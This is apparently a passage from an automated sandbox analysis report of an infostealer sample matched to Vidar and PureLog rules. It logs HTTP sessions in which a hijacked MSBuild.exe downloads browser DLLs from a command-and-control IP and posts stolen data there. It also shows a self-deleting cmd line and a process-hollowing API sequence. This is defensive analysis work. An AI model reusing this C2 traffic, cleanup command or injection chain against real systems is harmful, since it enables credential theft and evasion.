2024-05-24 08:27:18 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49756 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:18 UTC | 173 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:19 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:19 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-a7550"
Accept-Ranges: bytes
                                                                                        Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                        Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                        Data Ascii: 0<48%8A)$(


Session ID: 13
Source IP: 192.168.2.4
Source Port: 49757
Destination IP: 78.47.123.174
Destination Port: 443
PID: 6712
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:20 UTC | 173 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:21 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:21 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID: 14
Source IP: 192.168.2.4
Source Port: 49758
Destination IP: 78.47.123.174
Destination Port: 443
PID: 6712
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:22 UTC | 174 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:23 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:22 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes


Session ID: 15
Source IP: 192.168.2.4
Source Port: 49759
Destination IP: 78.47.123.174
Destination Port: 443
PID: 6712
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:24 UTC | 170 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:24 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:24 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49760 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:27 UTC | 174 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:27 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:27 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49761 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:28 UTC | 178 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Cache-Control: no-cache
2024-05-24 08:27:29 UTC | 245 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:29 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-13bf0"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49762 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:30 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 08:27:30 UTC | 1145 | OUT | Data Ascii:
------GCAKKECAEGDGCBFIJEGH
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------GCAKKECAEGDGCBFIJEGH
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------GCAKKECAEGDGCBFIJEGH
Cont
2024-05-24 08:27:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:30 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
2024-05-24 08:27:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49763 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:31 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:31 UTC | 331 | OUT | Data Ascii:
------IDHDGDHJEGHIDGDHCGCB
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------IDHDGDHJEGHIDGDHCGCB
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------IDHDGDHJEGHIDGDHCGCB
Cont
2024-05-24 08:27:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49764 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:32 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:32 UTC | 331 | OUT | Data Ascii:
------AFHDAKJKFCFBGCBGDHCB
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------AFHDAKJKFCFBGCBGDHCB
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------AFHDAKJKFCFBGCBGDHCB
Cont
2024-05-24 08:27:33 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:33 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
2024-05-24 08:27:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49765 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:34 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:34 UTC | 331 | OUT | Data Ascii:
------DGCAAFBFBKFIDGDHJDBK
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------DGCAAFBFBKFIDGDHJDBK
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------DGCAAFBFBKFIDGDHJDBK
Cont
2024-05-24 08:27:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49766 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:35 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 453
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:35 UTC | 453 | OUT | Data Ascii:
------DAAFBAKECAEGCBFIEGDG
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------DAAFBAKECAEGCBFIEGDG
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------DAAFBAKECAEGCBFIEGDG
Cont
2024-05-24 08:27:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
2024-05-24 08:27:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49767 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:37 UTC | 281 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 130769
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:37 UTC | 16355 | OUT | Data Ascii:
------AKECBFBAEBKJJJJKFCGC
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------AKECBFBAEBKJJJJKFCGC
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------AKECBFBAEBKJJJJKFCGC
Cont
2024-05-24 08:27:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
2024-05-24 08:27:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49768 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:39 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGI
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
2024-05-24 08:27:39 UTC | 331 | OUT | Data Ascii:
------FBKJKEHIJECGCBFIJEGI
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------FBKJKEHIJECGCBFIJEGI
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------FBKJKEHIJECGCBFIJEGI
Cont
                                                                                        2024-05-24 08:27:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Target ID:0
                                                                                        Start time:04:26:59
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe"
                                                                                        Imagebase:0x5a0000
                                                                                        File size:5'039'032 bytes
                                                                                        MD5 hash:3D5D6485AF7CD75F9CB1284A35E70F97
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1764198655.0000000003F6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1764198655.0000000003F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1763723745.0000000002F96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1769696324.0000000005DC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:04:26:59
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                        Imagebase:0x980000
                                                                                        File size:262'432 bytes
                                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:04:27:00
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 1096
                                                                                        Imagebase:0x8a0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exit
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:04:27:41
                                                                                        Start date:24/05/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 10
                                                                                        Imagebase:0xe20000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                          Execution Graph

                                                                                          Execution Coverage:7.4%
                                                                                          Dynamic/Decrypted Code Coverage:12.6%
                                                                                          Signature Coverage:6%
                                                                                          Total number of Nodes:1192
                                                                                          Total number of Limit Nodes:55
5cc15b6 58662->58663 58664 5cc19c1 58663->58664 58735 543b2a0 58663->58735 58739 543b299 58663->58739 58664->58655 58669 5cc0eb8 58667->58669 58668 5cc19c1 58668->58655 58669->58668 58670 543b2a0 327 API calls 58669->58670 58671 543b299 327 API calls 58669->58671 58670->58668 58671->58668 58673 5cc0f15 58672->58673 58674 5cc19c1 58673->58674 58675 543b2a0 327 API calls 58673->58675 58676 543b299 327 API calls 58673->58676 58674->58655 58675->58674 58676->58674 58678 5cc272b 58677->58678 58786 543ba30 58678->58786 58790 543ba24 58678->58790 58679 5cc28de 58687 5cc29cb 58679->58687 58700 543bf30 Wow64SetThreadContext 58679->58700 58701 543bf28 Wow64SetThreadContext 58679->58701 58680 5cc2a0c 58704 543c030 VirtualAllocEx 58680->58704 58705 543c028 VirtualAllocEx 58680->58705 58681 5cc2a45 58681->58687 58694 543c150 WriteProcessMemory 58681->58694 58695 543c149 WriteProcessMemory 58681->58695 58682 5cc2cbb 58683 5cc2d0f 58682->58683 58692 543bf30 Wow64SetThreadContext 58682->58692 58693 543bf28 Wow64SetThreadContext 58682->58693 58688 543c150 WriteProcessMemory 58683->58688 58689 543c149 WriteProcessMemory 58683->58689 58684 5cc2b54 58684->58682 58690 543c150 WriteProcessMemory 58684->58690 58691 543c149 WriteProcessMemory 58684->58691 58685 5cc2da8 58686 5cc2df3 58685->58686 58696 543bf30 Wow64SetThreadContext 58685->58696 58697 543bf28 Wow64SetThreadContext 58685->58697 58698 543c2a0 ResumeThread 58686->58698 58699 543c2a8 ResumeThread 58686->58699 58687->58656 58688->58685 58689->58685 58690->58684 58691->58684 58692->58683 58693->58683 58694->58684 58695->58684 58696->58686 58697->58686 58698->58687 58699->58687 58700->58680 58701->58680 58704->58681 58705->58681 58707 5cc272b 58706->58707 58733 543ba30 CreateProcessA 58707->58733 58734 543ba24 CreateProcessA 58707->58734 58708 5cc28de 58716 5cc29cb 58708->58716 58794 543bf28 58708->58794 58798 543bf30 58708->58798 58709 5cc2a0c 58801 543c028 58709->58801 58805 543c030 58709->58805 58710 5cc2a45 58710->58716 58808 
543c150 58710->58808 58812 543c149 58710->58812 58711 5cc2cbb 58712 5cc2d0f 58711->58712 58719 543bf30 Wow64SetThreadContext 58711->58719 58720 543bf28 Wow64SetThreadContext 58711->58720 58717 543c150 WriteProcessMemory 58712->58717 58718 543c149 WriteProcessMemory 58712->58718 58713 5cc2b54 58713->58711 58721 543c150 WriteProcessMemory 58713->58721 58722 543c149 WriteProcessMemory 58713->58722 58714 5cc2da8 58715 5cc2df3 58714->58715 58725 543bf30 Wow64SetThreadContext 58714->58725 58726 543bf28 Wow64SetThreadContext 58714->58726 58816 543c2a8 58715->58816 58819 543c2a0 58715->58819 58716->58656 58717->58714 58718->58714 58719->58712 58720->58712 58721->58713 58722->58713 58725->58715 58726->58715 58733->58708 58734->58708 58736 543b30b 58735->58736 58743 6d033eb0 58736->58743 58737 543b334 58740 543b2a0 58739->58740 58742 6d033eb0 327 API calls 58740->58742 58741 543b334 58742->58741 58744 6d069bb5 77 API calls 58743->58744 58745 6d033f11 58744->58745 58746 6d069bb5 77 API calls 58745->58746 58747 6d033f36 58746->58747 58748 6d015050 77 API calls 58747->58748 58749 6d033f50 58748->58749 58750 6d069bb5 77 API calls 58749->58750 58751 6d033f57 58750->58751 58752 6d015050 77 API calls 58751->58752 58753 6d033f71 58752->58753 58754 6d069bb5 77 API calls 58753->58754 58755 6d033f78 58754->58755 58756 6d015050 77 API calls 58755->58756 58757 6d033f92 58756->58757 58758 6d069bb5 77 API calls 58757->58758 58759 6d033fab 58758->58759 58760 6d033fb2 58759->58760 58761 6d034031 58759->58761 58763 6d0116b0 327 API calls 58760->58763 58784 6d069533 66 API calls std::exception::_Copy_str 58761->58784 58768 6d033fdc moneypunct 58763->58768 58764 6d034047 58785 6d06ac75 RaiseException 58764->58785 58766 6d03405e 58767 6d069bb5 77 API calls 58766->58767 58769 6d0340b5 58767->58769 58768->58737 58770 6d069bb5 77 API calls 58769->58770 58771 6d0340d8 58770->58771 58772 6d015050 77 API calls 58771->58772 58773 6d0340f2 58772->58773 58774 6d069bb5 77 API calls 58773->58774 58775 
6d0340f9 58774->58775 58776 6d015050 77 API calls 58775->58776 58777 6d034113 58776->58777 58778 6d069bb5 77 API calls 58777->58778 58779 6d03411a 58778->58779 58780 6d015050 77 API calls 58779->58780 58781 6d034134 58780->58781 58782 6d0116b0 327 API calls 58781->58782 58783 6d034169 moneypunct 58782->58783 58783->58737 58784->58764 58785->58766 58788 543baae CreateProcessA 58786->58788 58789 543bd14 58788->58789 58792 543ba30 CreateProcessA 58790->58792 58793 543bd14 58792->58793 58795 543bf30 Wow64SetThreadContext 58794->58795 58797 543bfcd 58795->58797 58797->58709 58799 543bf78 Wow64SetThreadContext 58798->58799 58800 543bfcd 58799->58800 58800->58709 58802 543c030 VirtualAllocEx 58801->58802 58804 543c0ee 58802->58804 58804->58710 58806 543c078 VirtualAllocEx 58805->58806 58807 543c0ee 58806->58807 58807->58710 58809 543c1a0 WriteProcessMemory 58808->58809 58811 543c237 58809->58811 58811->58713 58813 543c150 WriteProcessMemory 58812->58813 58815 543c237 58813->58815 58815->58713 58817 543c2ed ResumeThread 58816->58817 58818 543c337 58817->58818 58818->58716 58820 543c2a8 ResumeThread 58819->58820 58822 543c337 58820->58822 58822->58716 59040 6d029357 59041 6d029368 59040->59041 59177 6d0269c0 59041->59177 59043 6d02ae62 SafeArrayDestroy 59044 6d02ae68 59043->59044 59045 6d02ae72 SafeArrayDestroy 59044->59045 59046 6d02ae7b 59044->59046 59045->59046 59048 6d02ae85 SafeArrayDestroy 59046->59048 59049 6d02ae8e 59046->59049 59047 6d0293ac 59050 6d0269c0 11 API calls 59047->59050 59146 6d028739 59047->59146 59048->59049 59051 6d02aea1 59049->59051 59052 6d02ae98 SafeArrayDestroy 59049->59052 59059 6d02943a 59050->59059 59053 6d02aeb4 59051->59053 59054 6d02aeab SafeArrayDestroy 59051->59054 59052->59051 59055 6d02aec7 59053->59055 59056 6d02aebe SafeArrayDestroy 59053->59056 59054->59053 59057 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59055->59057 59056->59055 59058 